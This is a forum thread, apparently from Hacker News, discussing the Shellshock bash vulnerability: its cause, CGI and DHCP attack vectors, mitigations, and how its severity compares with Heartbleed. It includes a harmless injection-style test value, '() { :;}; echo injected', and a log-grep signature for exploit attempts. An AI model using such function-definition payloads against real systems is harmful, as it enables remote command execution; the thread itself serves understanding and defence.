It's certainly possible to be at risk if, for instance, you had a CGI script that was specifically written in bash (i.e. starts with "#!/bin/bash") but that's a lot less likely.
So definitely patch your Debian/Ubuntu/etc machines but do your Redhat-based ones (and other places where "/bin/sh --version" indicates that it's bash) first.
It seems arbitrarily risky to say, effectively, "My bash is vulnerable, but it's OK because it's unlikely to be called due to the defaults being Something Else" -- that might be short-term reassurance, but it sure sounds safer to fix it even if you don't think it can be exploited.
By default I mean that new users are given bash as their shell, including the users for daemon services. So unless you assigned a different shell, or the service specifically asked for a shell other than the one linked by /bin/sh, they will be running bash.
When you use any functions in PHP to spawn another process (with the exception of pcntl_fork), PHP will execute a shell to run your process. That shell is then inheriting the parent environment.
If you (or any libraries you use) do not shell out, or if you're using php-fpm (which clears the environment and keeps headers out of it), then you are safe.
I think I have the same question.. why is this called a "bash" bug? Is it not a webserver bug? Why does the webserver send data to bash through environment variables? Is there no better way to do it?
CGI is an interface first defined in 1993, 21 years ago. No one thought setting user data in environment variables was a risky thing at the time.
More modern interfaces between dynamic code and webservers, like even FastCGI or SCGI or dozens of others do not pass user data over Environment variables, and instead pass data in various protocols over a socket.
It's a bash bug because the bug is ultimately in how bash parses environment variables. My understanding is quite limited, but IIUC, after the invalid function definition, the bash parser simply stops trying to parse the environment, and the remaining input tokens get used as arguments to the next command executed by the shell.
Sort of I guess, but why does bash need to loop over all of the env variables and execute them? I don't think CGI had any reason to think that would ever happen?
Bash is a shell; part of its purpose is to deal with environment variables. The bug here is that the parser is getting confused. The feature being abused is the ability to declare functions as part of an environment variable, which is used to transfer functions to subshells in bash. Now this itself is fine, but since the parser gets confused, it also executes commands after the function definition.
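The legitimate feature being described can be seen in a few lines (run this under bash; dash has no `export -f`):

```shell
# Define a function, export it, and watch a child bash inherit it through
# the environment - this is the mechanism shellshock's parser bug rode on.
greet() { echo hello from an inherited function; }
export -f greet
bash -c greet
```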
But it's generally understood that attackers should not be able to provide environment variable names. If the attacker can do that, they can also provide an alternative LD_PRELOAD variable.
I honestly can't see why this is "fine"... I understand it's not the security critical bug, but feeding all environment variables into some sort of interpreter...?!?
Ok, bash needs to transfer function definitions to child processes in order to implement something called inherited functions, and I guess you could argue that an environment variable is a reasonable place to store them. But WHY THE HELL does bash have to use the function name as the variable name?!? That's just insane to me...
Any sane programmer would store that shit in an environment variable with a known name (e.g. "BASH_INHERITED_FUNCTIONS"). Why doesn't bash do that?!?
It appears they are talking about requiring prefixes for these vars (finally). Still, you look at the c code / macros that parse this shit and have to shake your head. This is what they mean by "attack surface". http://www.openwall.com/lists/oss-security/2014/09/25/13
Folks, for what it's worth, here is a management briefing I wrote this morning. Please feel free to re-use, but please do give proper attribution. Please do comment and correct as appropriate.
Summary: Briefing for management on activities to minimize impacts of the "shellshock" computer vulnerability.
Status: Testing underway. Initial appraisals are that public-facing systems are likely not subject to shellshock. NOTE: The situation is fluid, due to the nature of the vulnerability. Personnel are also reaching out to hosting providers to assess the status of intervening systems.
What is it? A vulnerability in a command interpreter found on the vast majority of Linux and UNIX systems, including web servers, development machines, routers, firewalls, etc. The vulnerability could allow an anonymous attacker to execute arbitrary commands remotely, and to obtain the results of these commands via their browser. The security community has nicknamed the vulnerability "shellshock" since it affects computer command interpreters known as shells.
How does it work? Command interpreters, or "shells", are the computer components that allow users to type and execute computer commands. Anytime a user works in a terminal window, they are using a command interpreter - think of the DOS command prompt. Some GUI applications, especially administrative applications, are in fact just graphical interfaces to command interpreters. The most common command interpreter on Linux and UNIX is known as the "bash shell". Within the last several days, security researchers discovered that a serious vulnerability has been present in the vast majority of instances of bash for the last twenty years. This vulnerability allows an attacker with access to a bash shell to execute arbitrary commands. Because many web servers use system command interpreters to fulfill user requests, attackers need not have physical access to a system: The ability to issue web requests, using their browser or commonly-available command line tools, may be enough.
How bad could it be? Very, very bad. The vulnerability may exist on the vast majority of Linux and UNIX systems shipped over the last 20 years, including web servers, development machines, routers, firewalls, other network appliances, printers, Mac OSX computers, Android phones, and possibly iPhones (note: It has yet to be established that smartphones are affected, but given that Android and iOS are variants of Linux and UNIX, respectively, it would be premature to exclude them). Furthermore, many such systems have web-based administrative interfaces: While many of these machines do not provide a "web server" in the sense of a server providing content of interest to the casual or "normal" user, many do provide web-based interfaces for diagnostics and administration. Any such system that provides dynamic content using system utilities may be vulnerable.
What is the primary risk? There are two, data loss and system modification. By allowing an attacker to execute arbitrary commands, the shellshock vulnerability may allow the attacker to both obtain data from a system and to make changes to system configuration. There is also a third risk, that of using affected systems to launch attacks against other systems, so-called "reflector" attacks: The arbitrary command specified by the attacker could be to direct a network utility against a third machine.
How easy is it to detect the vulnerability? Surprisingly easily: A single command executed using ubiquitous system tools will reveal whether any particular web device or web server is vulnerable.
What are we doing? Technical personnel are using these commands to test all web servers and other devices we manage and are working with hosting providers to ensure that all devices upon which we depend have been tested. When devices are determined to be vulnerable, a determination is made whether they should be left alone (e.g., if they are not public facing and patches are either not yet available or would be disruptive at this time, or if there are other mitigations or safeguards in place), patched (e.g., if patches are available and are low impact), or turned off (e.g., if patches are not available, risk is high, and the service is not mandate critical).
Updates to this briefing will be provided as the situation develops.
> Initial appraisals are that public-facing systems are likely not subject to shellshock.
All the managers I know will stop reading after this, sit back and think "aaah, those silly techies. Worrying about nothing".
I gave exactly the opposite advice: We should assume every public and non-public facing system is vulnerable (many were). I'd rather cause a big stinky scare and be proven wrong than downplay the issue and be proven wrong... the hard way.
You probably had a good reason for saying this to your organisation, but it's not something that other people should blindly re-use for their own purposes.
Yes, I did have a good reason: Our initial tests indicate that the organization is not vulnerable.
To be fair to you and to me, I can understand your take on what I posted, but what I posted was redacted to remove organization-identifying information. A better redaction would perhaps have been: "Our initial scans and appraisals are that our public-facing systems are likely not subject to shellshock."
For any companies that handle customer data, especially PII or credit card information, even having the data access could be actionable and result in massive costs/fines.
If an attacker can fully control the name of an injected environment variable, then you've lost already. The attacker can override LD_PRELOAD, which is an environment variable honored by the Linux kernel itself.
Jesus. That's been out of support for well over 2 years. I can't imagine this is the only problem it has. I'm curious: what's keeping the organization from upgrading it?
This one doesn't even have the excuse of running a piece of lab equipment (I saw such a system recently running Win95 without OSR1, so it doesn't even have USB support. They move data around with ZIP disks!).
I've got to maintain a couple of RHEL4 servers that have simulation software running on them that has never been ported forward (education - the people who wrote it have long since left). Though we also still have a couple of DEC Alpha's kicking about attached to nanofabrication services. Fun times... Luckily I don't need to maintain all the win98 boxes we still have as well. Or the DOS ones.
You can tail your access.log and grep for an expression matching the exploit signature, e.g. "() {" (plus "cgi"), to get an idea if someone is trying to exploit your webserver. The cgi part will return a lot of false positives, but if you cannot disable CGI, you might as well track it being requested.
That will only find either clumsy exploit attempts or whitehat scans that are not trying to hide themselves.
CGI sends most headers through to the script as environment variables (i.e. a Foobar: header will turn into $HTTP_FOOBAR), so an attacker can just pick a header name that isn't likely to be logged.
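The mapping is mechanical, which is what gives the attacker free choice of header. A sketch of the name transformation (the Foobar header is the example above):

```shell
# CGI builds the env var name as HTTP_ plus the header name upper-cased,
# with '-' replaced by '_' (per the CGI spec's meta-variable rules):
header_name="Foobar"
env_name="HTTP_$(printf '%s' "$header_name" | tr 'a-z-' 'A-Z_')"
echo "$env_name"   # HTTP_FOOBAR
```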
Has anyone suggested and/or implemented something like a tiny wrapper for bash that would clean the environment and then execve("/bin/bash.vulnerable", argv, cleaned_envp)?
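Something along those lines can be demonstrated without touching /bin/bash at all. The key mechanism is `env -i`, which starts the child with an empty environment; a real wrapper would `exec` the renamed binary (the /bin/bash.vulnerable path above) after this scrubbing:

```shell
# The injected variable never survives env -i; only an explicit whitelist
# (here just PATH) is passed through to the child shell.
SECRET='() { :;}; echo injected' env -i PATH=/usr/bin:/bin sh -c 'echo "SECRET is ${SECRET:-gone}"'
```

Caveat: scrubbing the environment also breaks legitimate uses (exported functions, locale, daemon configuration), so it's a stopgap, not a substitute for patching.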
I've heard that replacing /bin/bash with a newer version of bash from homebrew or even zsh will work but is that going to break anything that assumes 3.2 bash??
Are you running an HTTP or SSH server that faces the public? If so you need to update or take mitigation steps ASAP. If not you can wait until apple patches.
I'm reluctant to add to uncertainty, but I'm not sure these are the only concerns. Many Linux systems execute shell scripts via bash after acquiring a DHCP address, and would be vulnerable if someone took over the DHCP servers in, say, a co-working space, cafe or airport and maliciously configured them. I'm not 100% sure if Mac OS X (or iOS) use shell scripts for post-assignment configuration. The short answer is to be careful about wireless access you don't control until Apple issues a patch.
Wait, what? I know DHCP clients have had exploits but those were of the more mundane buffer overflows/range checking type; there are DHCP clients implemented in bash? Something doesn't seem right about that - AFAIK DHCP data like IPs and so forth are binary, not text.
I've seen a lot of talk regarding the impact on embedded devices, but how many of these actually run GNU Bash? I can't think of many embedded devices that don't use Busybox instead.
>I can't think of many embedded devices that don't use Busybox instead.
What about all these shitty wireless routers out there? I think in the past they were QNX-based but they've long moved to being linux based. We know popular projects like dd-wrt and pfsense are probably okay (ash instead of bash), but what about the thousands of others? My own router is supplied by AT&T for its u-verse service. God knows what its running. Or all the NAS devices out there and load balancers, etc.
I guess we'll find out when the whitehats are done scanning the entire internet for vulnerable hosts.
I have a higher-end (albeit still consumer-level) ASUS wireless router that uses Busybox. I can't imagine that cheaper, lower-end models would be using full GNU bash instead.
The vulnerability only exists during the startup of a bash process. Updating bash is enough. Bash processes that are already running are past the point where they could be exploited. Future calls to bash will get the updated version. No services need to be restarted to apply the fix.
Note that you'll typically want to supply the URL to a CGI script on the site, not just www.example.com. Don't think you're unaffected just because the top-level page of your site doesn't appear vulnerable.
Either of these will typically show you your running terminal:
ps -p $$
echo $0
(command name that was used to invoke the shell)
Not reliable:
echo $SHELL
(preferred shell for the user, not necessarily what is running)
Also note that you may want to remove/fix bash to make sure it doesn't get run by something else. A CGI script may run it despite you changing your default shell to something else.
On the one hand, if this had been in Windows, no one in the public would have been able to stumble across it, though you would expect them to be paying rooms full of engineers to make sure that's never necessary (and yet stuff happens.)
On the other hand, despite the premise of open source that 'many eyes make all bugs shallow', the amount of code in the wild and the complexity of it (and the diversity of implementation languages) has pretty much guaranteed that there's more code than possible coverage.
No one has to come up with clever marketing for Microsoft exploits because everyone expects there to be tons of them, given the level of complexity, and that Microsoft will push patches for them, because it affects their bottom line. Meanwhile, it seems in the open source world, you need PR campaigns to goad the community into due diligence.
>But people can casually look at code and see vulnerabilities, any time they want.
They could, but they don't. Same way I can look at the sky and see an asteroid. Possible? Sure. Likely? Not without some pretty advanced tools or a hell of a lot of luck.
>But people can casually look at code and see vulnerabilities, any time they want.
I think you're dismissing the level of experience, smarts, and inter-disciplinary knowledge it takes to find a bug like this. More than likely, even those with all those skills, even the top 1% of them, can't just eyeball code and go, "Ah yes, here." They're instead writing a lot of little tools and seeing what they can break. Then they go back, see what broke, and work out if it's possible to exploit that exception or crash condition.
These types of tools and methods work just as well with closed source. Attacking closed source seems very unfair to me in these scenarios.
> ...if this had been in Windows, no one in the public would have been able to stumble across it...
Kind of a broad statement there, isn't it?
By your logic - Where do zero day Windows vulnerabilities come from then? People outside of Microsoft have certainly reported security issues to Microsoft in the past.
Can you name those hundreds of issues discovered on Windows stack for, say, 2014? I'm on IIS and I really want to know if I'm missing something.
MS had its fair share of security flaws in the past, but give them credit for their current state. You sound like people still talking about BSODs, which are certainly a thing of the past.
There are a lot of comments below stating mod_php is just as vulnerable as mod_cgi. This is NOT the case, mod_php is unaffected by shellshock.
Edit: Just to be clear, even using system / exec etc is not affected as the environment variables are not passed along to the sub process by the apache sapi.
I seem to remember somewhere on Show HN a service that lets one execute a command to populate an online pastebin. Something like: `cat | nc service.com 9199`. Now however I cannot find this service. Anyone know where?
ISC DHCP Client has a check_option_values function (at the end of dhclient.c), which (if it is properly used; I don't understand the surrounding code well enough to say) should prevent this from being exploited.
Can the bug be avoided just by setting the default shell for your webserver's user (generally www-data in debian) to /bin/dash? At least from the perspective of Apache users?
The CGI and SSH attack vectors are getting a lot of attention because they are so trivially exploitable. But as someone (I believe tptacek) put it in another thread, this bug has one of the biggest potential attack surfaces in history. Anything that sets any environment variable to an untrusted value and then invokes bash is vulnerable. For example, on some systems, simply connecting to an attacker-controlled network is enough to cause code execution through the DHCP client.
If you choose not to upgrade bash, you are trusting that none of the code on your system uses bash in this way. It's extremely unlikely that the vectors that have been publicized so far are the only major ones.
Alright so necessary conditions are "sets env variables" + "invoke bash". That clarifies, thanks.
I'm not advocating not updating, I'm just trying to understand what to do with this info for say, my hosted project that _doesn't set env vars nor invoke bash_.
There's no way that this bug could affect even a fraction of the number of users Heartbleed did. The number of affected machines is probably 1/10000th that of heartbleed, and heartbleed exposed hundreds of millions of users, the SSL keys of servers, etc to attack. The fact that legacy CGI scripts are the only attack vector being discussed right now is proof enough of how outdated this bug is.
Keep in mind that hackers constantly take advantage of old exploitable legacy software in servers around the world to get a shell, and nobody freaks out about it.
Plenty of stuff uses environment variables and in places one may not think it vulnerable. Reviewing some of our own software, it's unclear, just from documentation, which third-party systems actually pass some environment when shelling or not.
"Legacy CGI" might be discussed as a clear-and-easy example but this will impact many, many other systems.
Even if this bug affects every single *NIX server in the world, it still hasn't exposed, for example, CloudFlare's private keys, or your Gmail/Yahoo mail, or the clients (and keys) connected to VPNs around the globe. Heartbleed exposed so much private information, immediately, that it was the biggest private data leak in history, and will remain so for decades.
This bash bug lets you run code, but on a much smaller number of servers, without an immediate impact on the world's most important services, and won't give up things like ssl keys without a local privilege escalation. It's much, much more limited in the scope of the immediate threat. It's still an immediate threat. I'm just saying it is nothing compared to Heartbleed.
cPanel is probably the most popular reseller hosting software for shared web hosting and it relies on CGI in all kinds of places. That alone provides a huge amount of exploitable hosts - I tried to Shodan it (port 2082) but it seems down right now.
Since cPanel is designed for people without system administration experience, it's unlikely they will be patched in a timely manner too. All the CGI scripts are in known static locations, so I wouldn't be surprised to see a worm that targets cPanel servers very soon.
This is definitely not going to affect just a few legacy CGI sites.
cPanel's official notice is that they checked and their code is not vulnerable (at least, whatever their current code is).
Of course it's possible that other CGI apps will execute a shell at some point, and that there's bound to be plenty of servers that are exploitable. But the number of SSL-bearing sites, and the sheer number of users (I mean, hundreds of millions, at least) that were exposed due to such gigantic sites having a huge hole for so long, meant that virtually everyone's personal information was vulnerable, immediately, to say nothing of stealing SSL keys.
This is definitely a serious bug. Any remote code execution is a top priority. But I've never seen a bug like Heartbleed before, and it's unlikely we ever will again, as (hopefully?) it will change the way forward-facing services are deployed to implement proper memory protection between transport and application layers. Compared to exposing the personal information (and secured keys) of so many users and domains, just executing code on miscellaneous servers seems cute in comparison.
But it seems you only need one login to compromise the whole server. If I buy $3 hosting on a shared server then I can pwn the whole server, can't I (using cPanel to escalate an attack above my privilege level)? What are the chances that one user account on a shared server is crackable? Pretty high, I'd imagine.
However... this just shows that the bash installation has this problem. If your running webserver is not interacting with bash, then there is no problem at all.
So look at your webserver. It's not per se a problem in bash. It's more a problem of webservers using bash directly.
There are many network daemons besides httpd which, if they delegate request handling to any other process or system functionality, may:
1. Invoke bash somewhere in the call stack
2. Pass request data via environment variables
If both of these are true, then the daemon is presumed vulnerable. You may still be vulnerable if (2) is false (by design) yet the attacker is able to set environment variables.
CGI / Apache / httpd is the obvious vector, but don't be lured into complacency.
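A rough first-pass audit for condition (1), with example paths (adjust for your distro and whatever daemons you actually run):

```shell
# List files under common vector directories that invoke bash explicitly;
# every hit deserves a closer look for attacker-influenced env vars.
grep -rl -e '#!/bin/bash' -e '/bin/bash' /etc/init.d /usr/lib/cgi-bin 2>/dev/null \
  || echo "no explicit bash callers found (or paths absent)"
```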